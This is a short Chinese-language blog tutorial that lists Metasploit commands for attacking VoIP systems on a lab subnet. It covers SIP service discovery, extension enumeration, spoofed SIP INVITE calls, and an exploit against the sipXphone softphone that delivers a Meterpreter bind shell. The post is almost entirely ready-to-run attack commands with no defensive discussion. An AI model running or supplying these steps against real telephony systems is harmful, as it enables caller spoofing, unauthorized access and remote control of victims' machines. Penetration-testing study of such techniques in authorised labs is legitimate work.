渗透之——利用Metasploit渗透VOIP

原创

冰河技术 2019-01-18 11:22:04 ©著作权

©著作权归作者所有：来自51CTO博客作者冰河技术的原创作品，请联系作者获取转载授权，否则将追究法律责任

转载请注明出处：https://blog.csdn.net/l1028386804/article/details/86536861

1.对VOIP服务踩点

use auxiliary/scanner/sip/options
show options
set RHOSTS 192.168.109.0/24
run

2.扫描VOIP服务

use auxiliary/scanner/sip/enumerator
show options
set MINEXT 3000
set MAXEXT 3005
set PADLEN 4
set RHOSTS 192.168.109.0/24
run

3. 欺骗VOIP电话

use auxiliary/voip/sip_invite_spoof
set RHOSTS 192.168.109.141
set EXTENSION 4444
show options
run

4.渗透VOIP

use exploit/windows/sip/sipxphone_cseq
set RHOST 192.168.109.141
set payload windows/meterpreter/bind_tcp
set LHOST 192.168.109.137
show options
exploit

上一篇：Metasploit实战一之——使用OpenVAS进行漏洞扫描

下一篇：渗透之——利用Metasploit渗透DATAC RealWin SCADA Server 2.0

提问和评论都可以，用心的回复会被更多人看到评论

发布评论

相关文章

官方博客	全部文章	热门标签	班级博客
了解我们	网站地图	意见反馈

鸿蒙开发者社区	51CTO学堂
51CTO	软考资讯